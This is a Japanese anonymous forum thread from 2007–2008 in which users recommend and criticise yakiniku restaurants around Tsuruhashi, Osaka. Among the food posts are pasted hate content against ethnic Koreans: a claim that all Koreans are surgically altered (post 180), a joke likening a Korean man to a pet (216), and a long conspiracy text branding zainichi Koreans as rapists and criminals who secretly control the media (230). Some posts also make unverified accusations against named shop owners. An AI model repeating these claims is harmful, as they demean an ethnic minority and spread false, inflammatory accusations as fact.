133 :名無しさん@お腹いっぱい。:2007/04/29(日) 22:00:46 ID:6emYSPo9
鶴一ってのは、とにかく肉で腹をパンパンにするための店。
なんで >>131 の感覚が普通で、>>132 の舌が腐ってる。

134 :名無しさん@お腹いっぱい。:2007/04/30(月) 19:11:16 ID:ntFuNPIV
>>133
お前の舌が腐ってるんだろw

135 :名無しさん@お腹いっぱい。:2007/04/30(月) 19:16:16 ID:1n6tdtW6
桃谷になるけど萬野は?

韓国料理なら北堀江のソウルK。
元まだんの料理長がやってる店。
鶴橋ではないけど、何頼んでもハズレがなく大阪1美味しいと思う。
何気に芸能人見れるし。

136 :名無しさん@お腹いっぱい。:2007/05/01(火) 02:30:37 ID:4LSYk9+T
>>135
正月早々サトエリ&海老蔵みた。
縁起悪い??

137 :名無しさん@お腹いっぱい。:2007/05/13(日) 02:06:16 ID:Njq1JIsC
 ゴールデンウィークに大吉へ行った

3日の夜という事で夜そこそこ並んでいた
俺の前に居た奴は一人で並び、店主?(さんまと写真一緒の奴)に露骨にいやな顔をされても
めげることなく一人で焼き、一人で食い、帰っていった

 漢と書いてオトコと読みたい、夜の出来事

138 :名無しさん@お腹いっぱい。:2007/05/13(日) 20:08:13 ID:9azWL1zn
>>137
一人客をないがしろにする店は先行き暗いよ
未来の客を捨ててるんだから

139 :137:2007/05/14(月) 00:00:11 ID:PsHUo4Wn
あの日のあの状況では目の前のたくさん並んだ客をさばくのに必死だったとも思う
一階の長いテーブル(ロースター2個)のどっか隅っこが空いていたのを店主が思い出したみたいで
急に曇った顔が晴れて、その漢を(あ、早々、あそこがあったわって感じで)案内してた
よかったよかったと思いました

138さんの意見にはげしく同意なんですが、大吉結構気に入ってるからまた行きそう

140 :名無しさん@お腹いっぱい。:2007/05/29(火) 03:09:00 ID:wrR0kD85
釜山家のタレ好きだな。

141 :名無しさん@お腹いっぱい。:2007/05/29(火) 04:32:50 ID:IqOGEvRW
2007/04/24-12:04 連続婦女暴行で無期懲役=「恐怖に付け込み卑劣」−大阪地裁

大阪府内で2004〜05年、18人の女性に乱暴するなどしたとして、
強盗強姦(ごうかん)などの罪に問われた無職金寿明被告(25)に対する判決公判が24日、
大阪地裁であった。中川博之裁判長は「極めて悪らつで、女性の恐怖心に付け込んだ巧妙で卑劣な犯行」と述べ、
求刑通り無期懲役を言い渡した。
中川裁判長は「被害者は女性としての尊厳を著しくじゅうりんされ、被告には本来備わっている人間性が欠落している」と指弾した。

ttp://www.jiji.com/jc/c?g=soc_30&k=2007042400394
>無職金寿明被告(25)

朝日新聞
ttp://www.asahi.com/kansai/news/OSK200704240015.html
>無職松岡寿明被告(25)

毎日新聞
ttp://www.mainichi-msn.co.jp/shakai/jiken/news/20070424dde041040057000c.html
>大阪市生野区、無職、松岡寿明被告(25)

NHK
ttp://www.nhk.or.jp/osaka/lnews/04.html
>大阪・生野区の無職、松岡寿明被告(25)

動画
ttp://www.youtube.com/watch?v=ORLmBZsZKlo

142 :名無しさん@お腹いっぱい。:2007/06/17(日) 05:37:49 ID:CYxE8V4j
昨日駅前の焼肉やへ行った。
まずかったー

143 :名無しさん@お腹いっぱい。:2007/06/17(日) 19:19:14 ID:yJYkOQHc
>>130
私も緑橋の海南亭は納得できん。
あの近辺なら松竹なんとかという店のほうが良かった。

144 :名無しさん@お腹いっぱい。:2007/07/04(水) 21:21:45 ID:N+l4DSlB
新楽井はどう?
ユッケがオススメって聞いたんだが

145 :名無しさん@お腹いっぱい。:2007/07/05(木) 00:45:34 ID:EJnu+ar0
>>144
一皿の量は多いが、メニューはかなり少ない。
味の方だが、塩タンは地雷、それ以外は、良い感じ。

146 :名無しさん@お腹いっぱい。:2007/07/05(木) 18:30:10 ID:efQzw+ZB
>>145
塩タンが地雷なのは結構致命的だなぁ・・・
とりあえず週末行ってみるよ
レスありがと

147 :名無しさん@お腹いっぱい。:2007/07/06(金) 16:15:14 ID:WCPk+HBb






■サッカー:U17日本代表、PK戦の末韓国に勝利

 23日午後2時、8カ国国際大会(U17)3位決定戦が行われ、
日本代表は韓国と対戦、PK戦の末勝利し3位となった。前半24分、水沼宏太の
ゴールで日本が先制。その後、韓国はペナルティーキック
からゴールを決め1-1の同点としたものの、その後PK戦にもつれこみ、7-6で
日本が勝利をおさめた

朝鮮日報JNS
http://www.chosunonline.com/article/20070623000031













148 :名無しさん@お腹いっぱい。:2007/07/07(土) 05:56:49 ID:hBvS9HTX
喜楽園がお勧めだと思うのですが。いかがでしょうか。
駅前じゃない方です。

あのタンは絶品です。

149 :名無しさん@お腹いっぱい。:2007/07/08(日) 23:32:29 ID:CRT4fzu2
このまえ万正に行った。評判どおり旨かったが
1人前ごとにタマネギが1枚すつついてくるのはキツかった。

150 :名無しさん@お腹いっぱい。:2007/08/13(月) 17:02:34 ID:yMO2CMPs
>>149
万正値段はどうだった?

151 :名無しさん@お腹いっぱい。:2007/08/15(水) 03:25:11 ID:ridRjii5
大吉、忘れてやしないか、みんな?



152 :名無しさん@お腹いっぱい。:2007/08/16(木) 01:15:16 ID:p6l/MIS0
>>148(゜∀。)y~~

153 :名無しさん@お腹いっぱい。:2007/08/17(金) 00:07:16 ID:IyIJkdEe
>>148
仲間がいて嬉しいよ。
鶴橋界隈のナンバーワンは喜楽園だ。
駅前じゃない方だ。

マスターが先月なくなったらしいよ。合掌。

154 :名無しさん@お腹いっぱい。:2007/08/17(金) 01:37:21 ID:lNCAUX51
息子の店長でなくて親??

155 :名無しさん@お腹いっぱい。:2007/08/18(土) 00:22:06 ID:JEYyQwPg
今日大村三吉へ行ってきた
甘いたれウマッ 

156 :155:2007/08/25(土) 01:33:18 ID:LZPWFU3S
 今日も(昨日だ)大吉行ってきた

 シマ腸とテッチャンが激しく美味いと思うんだけど
ここのスレの人はもっとうまいテッチャン知ってるの?
この水準から先は下味の好みとかそういう部分の違いしかないのではないか?
 と思うほど美味かった

157 :名無しさん@お腹いっぱい。:2007/08/25(土) 19:49:53 ID:Yev3LTEC
鶴橋なら小川亭が一番無難な気がする。高めだけどはずれが無い。
海南亭は塩コショウだけで食べたい。明月館はサラダが好きだ。
何故かディープ地帯じゃない道路沿い3軒に行くことが多かったけど
海南亭はそういえば最近いってないな。
鶴橋じゃないけど弁天町のいけやまの冷麺は絶品だよん。


158 :名無しさん@お腹いっぱい。:2007/08/25(土) 21:13:44 ID:rkPyqsZB
>>157
小川亭の甘ったるい揉みタレがどうも合いません。

159 :名無しさん@お腹いっぱい。:2007/08/27(月) 21:42:15 ID:jolFhH0E
東小橋町の海南亭が好きです。

160 :名無しさん@お腹いっぱい。:2007/08/31(金) 13:38:51 ID:b13duvUp
>>156 シマチョウとテッチャンは同じですが?

161 :名無しさん@お腹いっぱい。:2007/09/01(土) 13:05:33 ID:sUx8eieG
なぜか分けてる店もある

162 :156:2007/09/02(日) 17:59:12 ID:IpmMxm/x
大村三吉さんの店での違いを自分なりに感じたのは
シマ腸は薄くて縞縞でウマー
てっちゃんはもう少し身厚で縞は無くて噛み応えがあってウマー

163 :名無しさん@お腹いっぱい。:2007/09/03(月) 01:50:46 ID:R8RkgQBb
>>162 肉厚でテッチャンといえば盲腸だろうね。

164 :156:2007/09/03(月) 21:58:15 ID:RKkFFoFA
盲腸ですかそうですか・・・



165 :名無しさん@お腹いっぱい。:2007/09/04(火) 08:13:03 ID:uYkPpiLr
俺は万正が好き。

やたら話しかけてくるコテコテのオバチャンが、たまにしんどい時があるがw


166 :名無し:2007/09/05(水) 02:06:30 ID:EtNxCStL
 鶴橋でうまい焼肉屋は、一条道路沿いにあるカルビハウスやパゴタかな。
地元の人間として、アジヨシや鶴一ははっきり言ってまずいし高い。
なんで皆あんな店に行くんかな。一昔はアジヨシけっこううまかったけど、
最近久しぶりに行ったら味落ちてた。冷麺のダシなんか味ないし水みたい。
それと、サラリーやOLさんは一条道路にある「あらい」をうまいって
言ってるみたいやけど、あんなまずい店よりもっとうまい店はコリアタウンに
あるよ。とにかくカルビハウスはうまいし安いしボリュームあるし、おすすめ!!

167 :名無しさん@お腹いっぱい。:2007/09/05(水) 07:42:19 ID:E1Q+fAbC
元祖でぶやで「空」でてきた


168 :名無しさん@お腹いっぱい。:2007/09/05(水) 11:43:26 ID:NtltHcS1
>>166
ほぼ同意。あと、西光園も付け加えておいてくれ。
新楽井は昔の値段を知っているだけに、今はとても行く気にならんよな。

169 :名無しさん@お腹いっぱい。:2007/09/08(土) 00:01:48 ID:759mIV02
へたな店より松屋の牛焼肉定食のほうがぜんぜんうまいんだが

170 :名無しさん@お腹いっぱい。:2007/09/09(日) 06:01:13 ID:mPJcttNC
カルビハウスってそんなにいいの?

171 :名無しさん@お腹いっぱい。:2007/09/11(火) 04:07:57 ID:Ahb36km8
>>169
お前の舌は死んでる

172 :名無しさん@お腹いっぱい。:2007/09/11(火) 23:52:12 ID:xMhODb2q
>>166
>西○園も付け加えておいてくれ。

うーん、その店の肉は、如何な物かと・・・・。
見た目は綺麗なサシが入って旨そうだが、実際食べると、脂っこいだけで
旨みが無いし、口の中で溶けない。
それに、一皿あたりの値段は安く見えるが、量が少ない。

173 :名無しさん@お腹いっぱい。:2007/09/17(月) 22:37:34 ID:KH2up8xZ
海南亭に行きました
おいしかったです!!!

174 :四国の帝王 うらかん:2007/09/17(月) 22:58:28 ID:J3aQLqY1
栄作あの値段にしては美味しい。値段気にせんのやったら高いとこ行ったらいい。出来るだけ値段抑えたいなら栄作はええよ。前に行った時は無かったけど、レバサシ美味しかった。レバー嫌いやけど、あそこのは食えた。
関係無いけど、鳴戸の五苑値段以上に不味い。


175 :名無しさん@お腹いっぱい。:2007/09/20(木) 04:50:03 ID:XSp9NdAs
新楽井ってお店おいしかったです

176 :名無しさん@お腹いっぱい。:2007/09/22(土) 03:58:09 ID:J5lLx/pe
>>175
さっき南キャンのテレビに出てたよ〜
場所鶴橋のどこらへん?

177 :名無しさん@お腹いっぱい。:2007/09/23(日) 06:14:54 ID:8wfWme1u
噂で聞いたんだけどジンギスカンの蔵夢って閉店したんですか?

178 :名無しさん@お腹いっぱい。:2007/09/30(日) 22:20:49 ID:x8IO/2Yh
シマチョウ=大腸
テッチャン=小腸て
分けてる店が多いキガス 

なんか違う気が…

179 :名無しさん@お腹いっぱい。:2007/10/02(火) 04:44:20 ID:p7rinjlc
ひさびさに大吉行きてぇな・・・・、

空にも行きたい。



180 :名無しさん@お腹いっぱい。:2007/10/02(火) 08:34:34 ID:Ro6pAuvv
小学校
ttp://cafefiles.naver.net/data26/2007/9/12/34/%C5%C2%BF%AC19_ehddbs4575.jpg
   ↓
練習生時代
ttp://photoimg.enjoyjapan.naver.com/view/enjoybbs/viewphoto/pstar/240000/20070819118746859253494500.jpg
   ↓
現在
ttp://kr.img.blog.yahoo.com/ybi/1/94/9f/lhd1487/folder/43/img_43_8732_2?1187952054.jpg

やはり朝鮮人は皆整形


181 :名無しさん@お腹いっぱい。:2007/10/10(水) 08:11:28 ID:N/zi2io+
up

182 :名無しさん@お腹いっぱい。:2007/10/11(木) 17:15:24 ID:owH7idYw
>>180
たいてかわってない、たからかに言うほどまでの整形じゃねえよ道程

183 :名無しさん@お腹いっぱい。:2007/10/12(金) 00:22:54 ID:e6ari+qQ
関西ごはんの記事では大倉が一番評価高いぞ?
http://maromaro.com/archive/2006/09/09/post_811.php

184 :名無しさん@お腹いっぱい。:2007/10/17(水) 01:59:15 ID:TeLYVUpE
失笑焼肉・大倉

185 :日本一・宮崎牛:2007/10/20(土) 17:29:23 ID:bdoU4hVB

日本最強の牛とは…?
『 宮崎牛 』 なんです。


http://www.nishinippon.co.jp/nnp/economics/20071015/20071015_020.shtml


186 :名無しさん@お腹いっぱい。:2007/10/21(日) 18:51:39 ID:8ofCfPLg
>>166
鶴一は最悪
汚いマントヒヒが気分しだいでイジメまくりでやめさせたり

また店員は陰で店のもん食ったり焼いたりやりたい放題だし
陰で客の悪口言うわ

不味い肉平気で出して客に「昔と全然違う」ってクレームだし

マントヒヒババアと老いたモンチッチみたいなキモいババアが汚いイジメばかりしては好き放題して客をあざわらう腐れた店
ミスチルに似てるヤツいるけどコイツもマントヒヒのしもべでキモい
店員は皆朝から晩までパチンコがよいで店の肉焼いて食ってるしw
まぢキモい

187 :名無しさん@お腹いっぱい。:2007/10/22(月) 03:27:12 ID:ra+0k/sg
>>186
なんだ、クビになった元店員かw

188 :名無しさん@お腹いっぱい。:2007/10/25(木) 08:21:53 ID:EwJQArOw
空に行きました。
そんな、並ぶほどおいしいの?
普通だったけど・・・

189 :名無しさん@お腹いっぱい。:2007/10/25(木) 08:42:05 ID:m+BjClay
http://chiba.tm.land.to/upload/src/up1985.jpg

190 :名無しさん@お腹いっぱい。:2007/10/25(木) 10:26:26 ID:ngscTVQK
空は普通だな。
いかにも鶴橋っぽい雰囲気をありがたがる観光客が行く店だからね。
地元民からすると量の割に高いし行列が出来るしまず行かないな。

191 :188:2007/10/25(木) 21:54:02 ID:EwJQArOw
>>190
そうなんですね。
納得です。

オススメの焼肉やさんおしえてください!

192 :名無しさん@お腹いっぱい。:2007/10/26(金) 18:01:29 ID:xfrDqXFO
まあ好みもあるけど鶴橋の駅前はパスして
上本町方面のパゴタか小川亭とらちゃん、
串ホルモンでいいなら大成屋とか茂利屋、
桃谷まで行って萬野や西光園、高橋あたりかな。

193 :名無しさん@お腹いっぱい。:2007/10/30(火) 06:28:15 ID:aPbImlNZ
この前海南亭行ったけどダイコンキムチ酸っぱいを通り越して腐ってたぞ!
あのババアふざけとんな!

194 :名無しさん@お腹いっぱい。:2007/11/07(水) 01:56:56 ID:1iP4nrFq
あげあげ

195 :名無しさん@お腹いっぱい。:2007/11/07(水) 05:25:26 ID:O7tCBPRz

民団:地方参政権求め全国決起大会 あす日比谷公園で開催、参加呼びかけ /東京

在日本大韓民国民団(民団)は7日午後1時から、千代田区の日比谷公園大音楽堂で在日コリアンら
永住外国人の地方参政権(議員、首長)実現を求める全国決起大会を開く。
こうした集会は01年6月以来6年ぶりで、全国から民団や日本人の市民団体の関係者らが集まり、
公職選挙法や地方自治法の一部改正などを通じて地方参政権が認められるよう求める。

 大会には韓日議員連盟の関係者や日本の与野党の幹部が出席。住民税などを負担し、日本社会の
一員として生活する永住外国人について、住民として権利を保障することや、05年6月に韓国が
19歳以上の永住資格外国人に地方選挙権を認めることを決め、欧州も認める方向にあることから、
日本政府や国会議員も参政権問題に真剣に取り組むよう求める。大会後、午後2時ごろから日比谷や
新橋など1・8キロをデモ行進する。

 民団によると、全国の自治体が地方参政権付与に賛同する例は相次いでおり、最高裁も付与を
認める判決を出している。徐元〓(ソウォンチョル)・民団国際局長兼民生局長は「地方参政権の
議論は小泉純一郎政権以降なかなか進まなかったが、アジア外交を重視する福田政権下での前進を
強く期待している」と話し、国籍を問わず大会への参加を呼びかけている。
問い合わせは民団(03・3454・4619)。【工藤哲】

http://mainichi.jp/area/tokyo/news/20071106ddlk13040149000c.html



196 :名無しさん@お腹いっぱい。:2007/11/16(金) 22:30:49 ID:qLQZQ6+o
海南亭のランチ、お値打ちだ!

197 :名無しさん@お腹いっぱい。:2007/11/18(日) 00:28:47 ID:Rw+NhMe8
鶴橋は安いとこも普通のとこも高いとこも何軒か行ったけどどこも似たり寄ったり…。
特別美味しいとこってなかったなぁ。
鶴橋が地元の韓国系の友達に聞いたら、「店によるけど大抵、日本人と韓国人に出す肉は違うよ」って…。
特に高い店に見られる傾向らしいです。同じ、お金出してるのになんかショック。

198 :名無しさん@お腹いっぱい。:2007/11/19(月) 17:44:44 ID:uihys7xc
新かどや ママと3姉妹でゆってる所はどう?

199 :名無しさん@お腹いっぱい。:2007/11/20(火) 21:54:48 ID:2Ip52Wyc
スイスホテルの近くにあるホルモン専門店は良かった。
若い兄ちゃんがビラ配ってる所。

200 :名無しさん@お腹いっぱい。:2007/11/21(水) 08:45:32 ID:wBTRq8EZ
>>199
どこ?名前おしえて!

201 :名無しさん@お腹いっぱい。:2007/11/21(水) 11:17:28 ID:LrW2MvDp
大倉の息子はオイラの同級生。

おばちゃんもそんなもんよ。

ここには書いてる人はいないけど、
その辺で一番美味しい焼肉屋は一つしかないわいや。

202 :名無しさん@お腹いっぱい。:2007/11/23(金) 12:13:16 ID:hMKJstaq
【夕刊フジ】大阪府警捜査4課が中田カウス(58)を事情聴取・吉本興業元会長の恐喝疑惑
1 :どあらφ ★:2007/11/21(水) 17:05:48 ID:???0
中田カウスを事情聴取…吉本興業元会長の恐喝疑惑
http://www.zakzak.co.jp/gei/2007_11/image/g2007112112yoshimoto01.jpg

吉本興業の中邨(なかむら)秀雄元会長(75)に対する恐喝疑惑で、大阪府警
捜査4課は21日、同社所属の漫才師、中田カウス氏(58)から任意で事情聴取を
行ったもようだ。同社の吉野伊佐男社長(65)に対しては、20日に任意の
事情聴取を行っている。捜査4課は今週中に、カウス氏らも含めた同社関係者
数人から順次事情聴取し、立件の可否を判断する。

中邨元会長から被害届が出されたことを受け、捜査4課は21日午前、カウス氏に
出頭を求め、任意で事情聴取を行った。

吉本関係者は「20日の午前10時から吉野社長が任意の事情聴取を受けたのは
事実。また、今日(21日)の午前10時からカウス氏が受けたようだ。これ以外にも、
故林裕章元会長の運転手や総務部の課長クラスなどが事情聴取を受けると聞いて
いる」と打ち明けた。

一連の吉本のお家騒動は今春、大崎洋副社長(54)に対する恐喝疑惑を本紙などが
スクープして表面化し、吉本創業一族の林元会長のマサ夫人(63)らとカウス氏が
メディア上でドロ沼の暴露合戦を展開している。

その過程で、中邨元会長による数億円規模の使途不明金疑惑なども表面化し、
カウス氏が林家の意向を受けて不明金の回収に動いた際、中邨元会長に対して
暴力団関係者の名を出すなどして脅したという疑惑が浮上していた。



203 :名無しさん@お腹いっぱい。:2007/11/25(日) 14:01:21 ID:IdM5M+jq
ageage

204 :名無しさん@お腹いっぱい。:2007/11/26(月) 21:55:39 ID:9UArPUEY
初めてぎゅうとに行ってきた、
俺はうまいと思ったな。
まあ、客単価1万円近いから当たり前か。

205 :名無しさん@お腹いっぱい。:2007/11/27(火) 02:22:28 ID:svNxmwV4

 日本における工作員の任務

 北朝鮮で日本語や日本の習慣を教育された工作員は、主に工作船で日本へ派遣される。
工作員には、次のような任務が付与される。

○ 対韓国工作(日本を拠点に、地下党組織構築、軍事、政治、経済など韓国の国内情報を収集)
○ 駐日韓国大使館及び民団(在日本大韓民国民団)に関する情報の収集及び工作
○ 自衛隊・在日米軍の編成、装備、士気に関する情報の収集
○ 防衛産業に関する情報の収集
○ 日本の韓国及び北朝鮮政策に関する情報の収集
○ 日・米・韓三国の関係に関する情報の収集
○ 日本の政治、経済、科学技術に関する情報の収集
○ 在日韓国・朝鮮人、韓国人留学生の抱き込み(工作員に育成)
○ 原子力発電所や新幹線、ダムなど有事の際の破壊工作対象の調査
○ 朝鮮総聯幹部の動向監視
○ 侵入ルートの開拓
○ 資金調達

206 :名無しさん@お腹いっぱい。:2007/11/27(火) 17:08:31 ID:JXk6khmb
>>197
そんな器用なこと店ができるわけないだろ
仕入れに無駄が多くなるし
金持ってきてくれる客は全部一緒だよ

207 :名無しさん@お腹いっぱい。:2007/11/28(水) 13:19:48 ID:Umm1Jwto
今日鶴橋に焼肉食べに行こうと計画してるのですが、
そんな高くなくておいしいところはどこですか?

208 :名無しさん@お腹いっぱい。:2007/11/28(水) 19:06:33 ID:rpiUFWB7
んな所ない。もっと違うトコロ探せってば・・・。

209 :名無しさん@お腹いっぱい。:2007/11/29(木) 06:25:27 ID:0/BVl64/
>>207
牛角だよ、そういう時は。

210 :名無しさん@お腹いっぱい。:2007/12/01(土) 15:33:37 ID:1CfimjI3
え〜〜〜〜っ

211 :名無しさん@お腹いっぱい。:2007/12/01(土) 16:01:21 ID:4com5kWD
今池のやまきへ逝け。

212 :名無しさん@お腹いっぱい。:2007/12/02(日) 11:40:37 ID:QpNaCHMC
211 二回氏ね

213 :名無しさん@お腹いっぱい。:2007/12/03(月) 23:07:25 ID:7XdHCfb/
鶴橋で美味しい精肉店教えて下さい

214 :名無しさん@お腹いっぱい。:2007/12/04(火) 09:59:36 ID:LANHBAI0
>>213
とらちゃん、萬野

215 :名無しさん@お腹いっぱい。:2007/12/06(木) 17:59:53 ID:exJHF7gG
age

216 :名無しさん@お腹いっぱい。:2007/12/08(土) 14:51:11 ID:jcLj8Z1u

ある朝鮮人が日本にやってきた。
本国ではそれなりの教育を受けていた彼は、 店に入ると店主に言った。
「ご主人、肉を200g売ってくれませんか?」
店主は朝鮮人の言葉を聴いて、じろりと彼を見て、そして言った。
「あんた、朝鮮人だね」

朝鮮人は驚き、その日から寸暇を惜しんで日本語を勉強した。
1年後、彼はファッション誌を見て衣服を整えて、あの店へと向かった。
彼はなめらかに、そして完璧な発音で言った。
「ご主人、肉を200g売ってくれませんか?」
店主は朝鮮人の言葉を聴いて、上から下まで彼を見て、そして言った。
「あんた、朝鮮人だね」
朝鮮人は驚き、店主に尋ねた。
「なぜ私が朝鮮人と判ったのですか?私になにかおかしな点があったのですか?」
「あんたの発音は完璧だよ、どこから見ても日本人だしね。でもね、ここはペットショップなんだよ。」


217 :名無しさん@お腹いっぱい。:2007/12/09(日) 16:23:48 ID:3nhMi/sG
空にいる

218 :名無しさん@お腹いっぱい。:2007/12/23(日) 12:42:21 ID:azsqoRo7
万才橋ってゆう店はおいしいのですか?

219 :名無しさん@お腹いっぱい。:2008/01/06(日) 01:53:13 ID:i2SN+2CK
俺はかなりおいしいと思う。

220 :名無しさん@お腹いっぱい。:2008/01/06(日) 19:42:28 ID:LUcuRv40
どこにあるんですか?

221 :名無しさん@お腹いっぱい。:2008/01/07(月) 18:40:04 ID:UwiJ2ZCi
焼肉屋じゃないだろ。
鉄板鍋屋じゃないのか。

222 :名無しさん@お腹いっぱい。:2008/01/08(火) 22:08:58 ID:EZANy63O
小川亭の店主夫婦
めっちゃ性格悪いでー
アルバイトの給料ごまかすのは朝飯前
ドケチ夫婦!

223 :名無しさん@お腹いっぱい。:2008/01/08(火) 23:12:43 ID:G2b1K10M
やっぱり空やで!
日本橋のレンタルショーケース

Bockaeに日曜いってきたよ。

めちゃかわいい手作りロボのフィギュアがあった。

トランスフォーマーみたいにかっこいいやん、

また友達と買いに行くねん。


224 :名無しさん@お腹いっぱい。:2008/01/12(土) 16:19:01 ID:t9mqXvHq
あげ

225 :名無しさん@お腹いっぱい。:2008/01/20(日) 11:53:21 ID:kEjlUizj
新大阪周辺で良いトコある?
検索して『肉のきっしゃん』という焼肉屋がいいかなと思っているんだけど、
教えてちょうだい!

226 :名無しさん@お腹いっぱい。:2008/01/21(月) 08:17:55 ID:0h8iEv8o
>>206
あるで!
初回は最高の肉を出す→二回目、初回とは全く違う肉!

しかも、客をみて(客が若い、酒をよく飲む客など)だすらしい……
鶴橋じゃないけどね!!

実際、俺もしょうむない肉出されたから二度と行かない!

227 :名無しさん@お腹いっぱい。:2008/01/25(金) 12:38:16 ID:QwY2++gG
キムチ工房 麦の家 (韓国料理)

ムシ豚のポッサム定食(1000円)など、本場の料理が味わえる食堂。
ワケギと牛肉たっぷりのチヂミの王様・パジョンは、昼時以外はイートインも可能だ。


↑↑↑↑↑↑↑↑↑↑↑
誰かこの店行ったことある?
感想聞きたいんだけど


228 :名無しさん@お腹いっぱい。:2008/02/09(土) 04:35:14 ID:5kySJyLt
新楽井で、ユッケを食べてハラミを連発。これ最強。

229 :名無しさん@お腹いっぱい。:2008/02/14(木) 12:32:14 ID:Eu35WERm
今日、鶴橋駅で、ぼくが「駅の中で他の人を挑発した」
と思われているかもしれませんが、それは誤解です
ぼくは誰も挑発していません
よろしくお願いいたします
鶴橋駅界隈の皆様の幸せを祈っています


230 :名無しさん@お腹いっぱい。:2008/02/14(木) 20:25:51 ID:Pyd8ys5+
あなたの傍に、危険な【成りすまし】はいませんか?
【成りすまし】とは、偽名を名乗る在日朝鮮人の事です。

日本に60万人も居る朝鮮人は、日本の社会を破壊する事に快感を覚える民族です。
その犯罪志向性から本名を名乗らず、偽名を使って日本人に成りすまして犯罪を犯しているのです。
朝鮮人は戦後、駅前の一等地に住まう人々を襲い、強姦し、殺し、土地を占領してパチンコ屋、サラ金屋を立てました。
駅前があのような惨状を呈しているのはこういった経緯の為です。警察は敗戦で壊滅していました。

戦後、朝鮮人は余りに大々的に犯罪を犯しまくったが為に、
朝鮮人である事が暴露されると、犯罪者であると告白しているも同然と言う状況になってしまっており、
此れが為に朝鮮人は、偽名を使い出し日本人に成りすましました。

社会を害する違法賭博のパチンコ、サラ金、派遣業(奴隷商)で富豪となって日本経済を支配しています。
又、外国人でありながら「国民の為」と定める生活保護を、日本人よりも優先して受け取り、
小平市では年金を払っていなかった在日に対して年金の支給を決議しました。
しかし、これらを隠そうとするマスコミによって、これらは殆ど知られされていません。
在日が、戦略的にマスコミに縁故主義で多数の同胞を送り込んで、
スポンサー(パチサラCM)、記者、社員として内外から放送を支配して彼らの悪事を隠しているからです。
テレビや新聞の自虐的報道は成りすましウィルスによる症状なのです。

【成りすましの巣窟】
パチンコ サラ金 派遣業 TBS 暴力団 朝日新聞 宗教団体(カルトだけではありません)
芸能プロダクション

231 :名無しさん@お腹いっぱい。:2008/02/29(金) 00:52:42 ID:6XJeqbke
やっぱり鶴一かなあ

232 :名無しさん@お腹いっぱい。:2008/02/29(金) 01:06:05 ID:GTbkfLby
海南亭以外ありえん

233 :名無しさん@お腹いっぱい。:2008/03/01(土) 08:53:25 ID:w7af9mBF
釣る位置そんなにうまいか??

234 :名無しさん@お腹いっぱい。:2008/03/02(日) 15:17:14 ID:hG9cd0w+
>>233
美味しいよ!
超特別美味しいってわけじゃないが、普通に美味しい
特にタレとハラミ、骨付きカルビが絶品!


235 :名無しさん@お腹いっぱい。:2008/03/02(日) 15:32:50 ID:Xq0Ok6xe
海南亭、一人で行ったやつおるか?今度行こうとおもうんだが。

236 :名無しさん@お腹いっぱい。:2008/03/02(日) 16:25:07 ID:6/C0/HLR
>>235
つい1週間前一人で行ってみたよ。タレが自分好みじゃなかった。

237 :名無しさん@お腹いっぱい。:2008/03/02(日) 18:33:45 ID:Xq0Ok6xe
>236
う、うまかったですか!?(^^;

238 :名無しさん@お腹いっぱい。:2008/03/02(日) 18:44:47 ID:bYAe/VLT
>>236
うまいよ。タレが甘酸っぱいから好みは分かれるだろうが、
肉自体は相当うまい。上以上の肉を食うべし。

239 :名無しさん@お腹いっぱい。:2008/03/10(月) 21:09:01 ID:rHp1TEuV
やっぱ吉田やろ。

240 :名無しさん@お腹いっぱい。:2008/03/11(火) 23:30:54 ID:DcX2EGnJ
いやいや海南亭です!

241 :名無しさん@お腹いっぱい。:2008/03/12(水) 00:26:45 ID:V0u43b/P
そうおもうけど、海南亭高いよな。


242 :名無しさん@お腹いっぱい。:2008/03/12(水) 00:30:28 ID:QZZheFVn
一力が旨い

243 :名無しさん@お腹いっぱい。:2008/03/15(土) 15:43:08 ID:RTSzzd/D
空に行ってきたぜ〜

244 :名無しさん@お腹いっぱい。:2008/03/28(金) 00:15:38 ID:RuyZNcKo
アゲ

245 :名無しさん@お腹いっぱい。:2008/03/28(金) 08:30:59 ID:ul9V7aHh
空の姐さん萌え

246 :名無しさん@お腹いっぱい。:2008/03/29(土) 22:25:11 ID:rR4CpwA3
前から一度行ってみたくて、きのう夜9時すぎに
「空」に行ったら8人ぐらい並んでた。
遅くても混んでるもんだね。
あきらめて「吉田」に行ったら空いてた。
久しぶりに食ったけど、うめえなもう

247 :名無しさん@お腹いっぱい。:2008/03/30(日) 15:37:17 ID:nN2ABDlD
>>246
9時過ぎに8人程度なら20分も待ってれば食べられたのに。

248 :名無しさん@お腹いっぱい。:2008/04/06(日) 07:58:07 ID:BYDDv1dr
>197
国籍関係無しに常連かどうかで出すものが違うのはどんな店でもある。
顔見ただけで国籍判断なんてできない。
おまいはイラク人とイラン人を顔見ただけで見分けられるか?

>226
常連ならともかく、客が1回目か2回目かなんていちいち覚えてられるほど
記憶力すごい店員ばっかりなんてすごい店だね。

249 :名無しさん@お腹いっぱい。:2008/04/08(火) 00:27:42 ID:ql2YeR6f
顔見たらわかる事もあるぞ全部とはいえへんけどな 一度来た客を覚えてくれる店なんかスゴーくうれしかったなあ それもサービスの一つですって店長が言った手にはメモ帳に似顔絵と特長が書いてあった 逆にこっちが忘れない焼肉屋になった。

250 :名無しさん@お腹いっぱい。:2008/04/19(土) 13:05:19 ID:EDbMn5vD
海南亭の中で一番美味しいのはどこの店ですか?

251 :名無しさん@お腹いっぱい。:2008/04/19(土) 13:23:56 ID:EWBh0/Up
上六

252 :名無しさん@お腹いっぱい。:2008/04/21(月) 22:41:49 ID:e+j/jUe2
鶴一かなり久々(10年振り位?)に食べに行った
すごく劣化してた。
昔から1枚変な肉が入ってたけどあの味と雰囲気はもう味わえないのか・・・

253 :名無しさん@お腹いっぱい。:2008/04/23(水) 10:30:42 ID:+1kTRz8a
>>248
イラク人=アラブ人
イラン人=ペルシア人

顔見ただけで解るんじゃね?

254 :名無しさん@お腹いっぱい。:2008/04/23(水) 23:41:51 ID:dVfZE7cp
このスレ、ノートンが反応するけど大丈夫なのかよ。


255 :名無しさん@お腹いっぱい。:2008/04/25(金) 12:10:53 ID:ctTuGELW
つるはし商店街のパチモン情報ありませんか?

256 :名無しさん@お腹いっぱい。:2008/04/29(火) 10:18:02 ID:6PV1XPg+
アムソはどこ行った?
閉店か?うまかったのに。

257 :名無しさん@お腹いっぱい。:2008/05/10(土) 19:52:53 ID:soWHB3/q
up

258 :名無しさん@お腹いっぱい。:2008/05/11(日) 09:48:10 ID:FIlBqbdi
空は相変わらず混んでるねえ。
狙い目の時間帯はないものか。

海南亭は緑橋もええやろ。

259 :名無しさん@お腹いっぱい。:2008/05/11(日) 14:35:32 ID:PuWvxH4M
何回言っても迷うな鶴橋は
